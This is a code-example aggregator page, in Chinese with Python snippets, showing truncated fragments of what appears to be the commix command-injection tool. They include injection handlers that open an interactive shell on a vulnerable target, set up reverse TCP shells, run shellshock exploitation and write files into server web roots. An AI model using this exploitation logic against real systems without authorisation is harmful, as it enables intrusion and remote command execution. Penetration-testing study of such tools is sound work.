本文整理汇总了Python中src.core.injections.controller.checks.next_attack_vector函数的典型用法代码示例。如果您正苦于以下问题:Python next_attack_vector函数的具体用法?Python next_attack_vector怎么用?Python next_attack_vector使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了next_attack_vector函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: tb_injection_handler
#.........这里部分代码省略.........
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
gotshell = raw_input("(?) Do you want a Pseudo-Terminal? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
while True:
try:
# Tab compliter
readline.set_completer(menu.tab_completer)
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
if no_result == True:
return False
else:
return True
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
elif os_shell_option == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
lhost, lport = reverse_tcp.configure_reverse_tcp()
while True:
if lhost and lport in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(lhost)
else:
cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
break
# Command execution results.
from src.core.injections.results_based.techniques.classic import cb_injector
whitespace = settings.WHITESPACES[0]
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG)
# Exploirt injection result
if menu.options.verbose:
print ""
print Back.RED + "(x) Error: The reverse TCP connection has been failed!" + Style.RESET_ALL
else:
pass
else:
print ""
# The main command injection exploitation.
check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
# Exploirt injection result
tb_injector.export_injection_results(cmd, separator, output, check_how_long)
print ""
except KeyboardInterrupt:
raise
except SystemExit:
raise
elif gotshell in settings.CHOISE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOISE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例2: eb_injection_handler
#.........这里部分代码省略.........
return False
else:
return True
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
warn_msg = "You are already into an 'os_shell' mode."
print settings.print_warning_msg(warn_msg)+ "\n"
elif os_shell_option == "reverse_tcp":
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
continue
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# Evaluate injection results.
shell = eb_injector.injection_results(response, TAG, cmd)
if settings.VERBOSITY_LEVEL >= 1:
print ""
err_msg = "The reverse TCP connection has been failed!"
print settings.print_critical_msg(err_msg)
else:
pass
else:
# The main command injection exploitation.
response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
if menu.options.ignore_session or\
session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
# Evaluate injection results.
shell = eb_injector.injection_results(response, TAG, cmd)
shell = "".join(str(p) for p in shell).replace(" ", "", 1)
if not menu.options.ignore_session :
session_handler.store_cmd(url, cmd, shell, vuln_parameter)
else:
shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
#if shell:
if shell != "":
shell = "".join(str(p) for p in shell)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
err_msg = "The '" + cmd + "' command, does not return any output."
print "\n" + settings.print_error_msg(err_msg) + "\n"
except KeyboardInterrupt:
raise
except SystemExit:
raise
elif gotshell in settings.CHOICE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOICE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
err_msg = "'" + gotshell + "' is not a valid answer."
print settings.print_error_msg(err_msg) + "\n"
pass
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例3: tb_injection_handler
#.........这里部分代码省略.........
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
if no_result == True:
return False
else:
return True
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
print Fore.YELLOW + settings.WARNING_SIGN + "You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
elif os_shell_option == "reverse_tcp":
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
continue
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
from src.core.injections.results_based.techniques.classic import cb_injector
separator = checks.time_based_separators(separator, http_request_method)
whitespace = settings.WHITESPACES[0]
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG)
# Export injection result
if menu.options.verbose:
print ""
print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection has been failed!" + Style.RESET_ALL
else:
pass
else:
print ""
if menu.options.ignore_session or \
session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
# The main command injection exploitation.
check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response)
# Export injection result
tb_injector.export_injection_results(cmd, separator, output, check_how_long)
if not menu.options.ignore_session :
session_handler.store_cmd(url, cmd, output, vuln_parameter)
else:
output = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
print Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
print ""
except KeyboardInterrupt:
raise
except SystemExit:
raise
elif gotshell in settings.CHOICE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOICE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n"
pass
#break
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例4: cb_injection_handler
#.........这里部分代码省略.........
if go_back == True:
break
gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
while True:
try:
# Tab compliter
readline.set_completer(menu.tab_completer)
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
return False
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
print Fore.YELLOW + "(^) Warning: You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n"
elif os_shell_option == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
lhost, lport = reverse_tcp.configure_reverse_tcp()
while True:
if lhost and lport in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(lhost)
else:
cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
break
# Command execution results.
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG)
if menu.options.verbose:
print ""
print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
else:
pass
else:
# Command execution results.
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG)
if shell:
shell = "".join(str(p) for p in shell)
html_parser = HTMLParser.HTMLParser()
shell = html_parser.unescape(shell)
if shell != "":
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
if menu.options.verbose:
print ""
print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
except SystemExit:
raise
elif gotshell in settings.CHOISE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOISE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例5: cb_injection_handler
#.........这里部分代码省略.........
question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
sys.stdout.write(settings.print_question_msg(question_msg))
gotshell = sys.stdin.readline().replace("\n","").lower()
else:
gotshell = ""
if len(gotshell) == 0:
gotshell = "y"
if gotshell in settings.CHOICE_YES:
if not menu.options.batch:
print ""
print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
if not readline_error:
# Tab compliter
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE="")
if go_back and go_back_again == False:
break
if go_back and go_back_again:
return True
else:
# Command execution results.
time.sleep(timesec)
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# Try target page reload (if it is required).
if settings.URL_RELOAD:
response = requests.url_reload(url, timesec)
if menu.options.ignore_session or \
session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
# Evaluate injection results.
try:
shell = cb_injector.injection_results(response, TAG, cmd)
shell = "".join(str(p) for p in shell)
except:
print ""
continue
if not menu.options.ignore_session :
session_handler.store_cmd(url, cmd, shell, vuln_parameter)
else:
shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
if shell:
html_parser = HTMLParser.HTMLParser()
shell = html_parser.unescape(shell)
# Update logs with executed cmds and execution results.
logs.executed_command(filename, cmd, shell)
if shell != "":
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
if settings.VERBOSITY_LEVEL >= 1:
print ""
err_msg = "The '" + cmd + "' command, does not return any output."
print settings.print_critical_msg(err_msg) + "\n"
except KeyboardInterrupt:
raise
except SystemExit:
raise
except EOFError:
err_msg = "Exiting, due to EOFError."
print settings.print_error_msg(err_msg)
raise
elif gotshell in settings.CHOICE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOICE_QUIT:
raise SystemExit()
else:
err_msg = "'" + gotshell + "' is not a valid answer."
print settings.print_error_msg(err_msg)
pass
if no_result == True:
if settings.VERBOSITY_LEVEL == 0:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例6: tfb_injection_handler
#.........这里部分代码省略.........
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
warn_msg = "You are already into an 'os_shell' mode."
print settings.print_warning_msg(warn_msg)+ "\n"
elif os_shell_option == "reverse_tcp":
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
continue
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
from src.core.injections.results_based.techniques.classic import cb_injector
separator = checks.time_based_separators(separator, http_request_method)
whitespace = settings.WHITESPACE[0]
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG, cmd)
if settings.VERBOSITY_LEVEL >= 1:
print ""
err_msg = "The reverse TCP connection has failed!"
print settings.print_critical_msg(err_msg)
else:
pass
else:
print ""
if menu.options.ignore_session or \
session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
# The main command injection exploitation.
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response)
# Export injection result
tfb_injector.export_injection_results(cmd, separator, output, check_how_long)
if not menu.options.ignore_session :
session_handler.store_cmd(url, cmd, output, vuln_parameter)
else:
output = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
print Fore.GREEN + Style.BRIGHT + output + "\n" + Style.RESET_ALL
except KeyboardInterrupt:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except SystemExit:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
elif gotshell in settings.CHOICE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
return True
elif gotshell in settings.CHOICE_QUIT:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
err_msg = "'" + gotshell + "' is not a valid answer."
print settings.print_error_msg(err_msg)
pass
except KeyboardInterrupt:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except SystemExit:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例7: shellshock_handler
#.........这里部分代码省略.........
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
if no_result == True:
return False
else:
return True
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
warn_msg = "You are already into an 'os_shell' mode."
print settings.print_warning_msg(warn_msg)+ "\n"
elif os_shell_option == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
if menu.options.verbose:
print ""
err_msg = "The reverse TCP connection to the target host has been failed!"
print settings.print_error_msg(err_msg)
else:
pass
else:
shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
if shell != "":
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
if menu.options.verbose:
print "\n" + settings.print_payload(payload)
err_msg = "The '" + cmd + "' command, does not return any output."
print settings.print_error_msg(err_msg) + "\n"
except KeyboardInterrupt:
raise
except SystemExit:
raise
except:
print ""
sys.exit(0)
elif gotshell in settings.CHOICE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOICE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
err_msg = "'" + gotshell + "' is not a valid answer."
print settings.print_error_msg(err_msg) + "\n"
continue
break
else:
continue
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print "\n" + settings.print_error_msg(err_msg)
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
示例8: shell
response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
# Command execution results.
shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
if shell:
shell = " ".join(str(p) for p in shell)
if shell != "":
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
if not shell or shell == "":
print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
elif gotshell in settings.CHOISE_NO:
if menu.options.verbose:
print ""
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOISE_QUIT:
# Delete previous shell (text) files (output)
delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
示例9: shellshock_handler
#.........这里部分代码省略.........
else:
if enumerate_again == "":
enumerate_again = "enter"
print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
enumeration(url, cve, check_header, filename)
# File access options.
if settings.FILE_ACCESS_DONE == True :
while True:
file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower()
if file_access_again in settings.CHOISE_YES:
file_access(url, cve, check_header, filename)
break
elif file_access_again in settings.CHOISE_NO:
break
elif file_access_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if file_access_again == "":
file_access_again = "enter"
print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
file_access(url, cve, check_header, filename)
if menu.options.os_cmd:
cmd = menu.options.os_cmd
shell = cmd_exec(url, cmd, cve, check_header, filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
sys.exit(0)
else:
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
print ""
gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
else:
pass
else:
shell = cmd_exec(url, cmd, cve, check_header, filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
except:
print ""
sys.exit(0)
elif gotshell in settings.CHOISE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOISE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
continue
break
else:
continue
except urllib2.HTTPError, err:
print "\n" + Fore.YELLOW + "(^) Warning: " + str(err) + Style.RESET_ALL
示例10: tb_injection_handler
#.........这里部分代码省略.........
print ""
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
if not menu.options.batch:
question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
sys.stdout.write(settings.print_question_msg(question_msg))
gotshell = sys.stdin.readline().replace("\n","").lower()
else:
gotshell = ""
if len(gotshell) == 0:
gotshell = "y"
if gotshell in settings.CHOICE_YES:
if not menu.options.batch:
print ""
print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
if false_positive_warning:
warn_msg = "Due to unexpected time delays, it is highly "
warn_msg += "recommended to enable the 'reverse_tcp' option.\n"
sys.stdout.write("\r" + settings.print_warning_msg(warn_msg))
false_positive_warning = False
try:
# Tab compliter
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE="")
if go_back and go_back_again == False:
break
if go_back and go_back_again:
return True
else:
if menu.options.ignore_session or \
session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
# The main command injection exploitation.
check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response)
# Export injection result
tb_injector.export_injection_results(cmd, separator, output, check_how_long)
if not menu.options.ignore_session :
session_handler.store_cmd(url, cmd, output, vuln_parameter)
else:
output = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
print "\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
# Update logs with executed cmds and execution results.
logs.executed_command(filename, cmd, output)
print ""
except KeyboardInterrupt:
raise
except SystemExit:
raise
except EOFError:
err_msg = "Exiting, due to EOFError."
print settings.print_error_msg(err_msg)
raise
elif gotshell in settings.CHOICE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOICE_QUIT:
raise SystemExit()
else:
err_msg = "'" + gotshell + "' is not a valid answer."
print settings.print_error_msg(err_msg)
pass
break
if no_result == True:
if settings.VERBOSITY_LEVEL == 0:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例11: fb_injection_handler
def fb_injection_handler(url, delay, filename, http_request_method, url_time_response):
counter = 1
vp_flag = True
exit_loops = False
no_result = True
is_encoded = False
stop_injection = False
call_tmp_based = False
next_attack_vector = False
export_injection_info = False
injection_type = "semi-blind command injection"
technique = "file-based injection technique"
# Set temp path
if settings.TARGET_OS == "win":
if "microsoft-iis" in settings.SERVER_BANNER.lower():
settings.TMP_PATH = "C:\\Windows\TEMP\\"
else:
settings.TMP_PATH = "%temp%\\"
else:
settings.TMP_PATH = "/tmp/"
if menu.options.tmp_path:
tmp_path = menu.options.tmp_path
else:
tmp_path = settings.TMP_PATH
if settings.DEFAULT_SRV_ROOT_DIR != settings.SRV_ROOT_DIR:
settings.SRV_ROOT_DIR = settings.DEFAULT_SRV_ROOT_DIR
if menu.options.file_dest and '/tmp/' in menu.options.file_dest:
call_tmp_based = True
else:
if menu.options.srv_root_dir:
settings.SRV_ROOT_DIR = menu.options.srv_root_dir
else:
# Debian/Ubunt have been updated to use /var/www/html as default instead of /var/www.
if "apache" in settings.SERVER_BANNER.lower():
if "debian" or "ubuntu" in settings.SERVER_BANNER.lower():
try:
check_version = re.findall(r"/(.*)\.", settings.SERVER_BANNER.lower())
if check_version[0] > "2.3" and not settings.TARGET_OS == "win":
# Add "/html" to servers root directory
settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html"
else:
settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR
except IndexError:
pass
# Add "/html" to servers root directory
elif "fedora" or "centos" in settings.SERVER_BANNER.lower():
settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html"
else:
pass
# On more recent versions (>= "1.2.4") the default root path has changed to "/usr/share/nginx/html"
elif "nginx" in settings.SERVER_BANNER.lower():
try:
check_version = re.findall(r"/(.*)\.", settings.SERVER_BANNER.lower())
if check_version[0] >= "1.2.4":
# Add "/html" to servers root directory
settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html"
else:
# Add "/www" to servers root directory
settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/www"
except IndexError:
pass
elif "microsoft-iis" in settings.SERVER_BANNER.lower():
pass
else:
# Provide custom server's root directory.
custom_srv_root_dir()
path = urlparse.urlparse(url).path
path_parts = path.split('/')
count = 0
for part in path_parts:
count = count + 1
count = count - 1
last_param = path_parts[count]
EXTRA_DIR = path.replace(last_param, "")
settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + EXTRA_DIR
if settings.TARGET_OS == "win":
settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR.replace("/","\\")
if not settings.LOAD_SESSION or settings.RETEST == True:
info_msg = "Trying to create a file in '" + settings.SRV_ROOT_DIR + "'... "
print settings.print_info_msg(info_msg)
i = 0
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
# Calculate all possible combinations
total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
# Check if defined alter shell
alter_shell = menu.options.alter_shell
for whitespace in settings.WHITESPACE:
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
#.........这里部分代码省略.........
示例12: shellshock_handler
#.........这里部分代码省略.........
gotshell= "y"
if gotshell in settings.CHOICE_YES:
if not menu.options.batch:
print ""
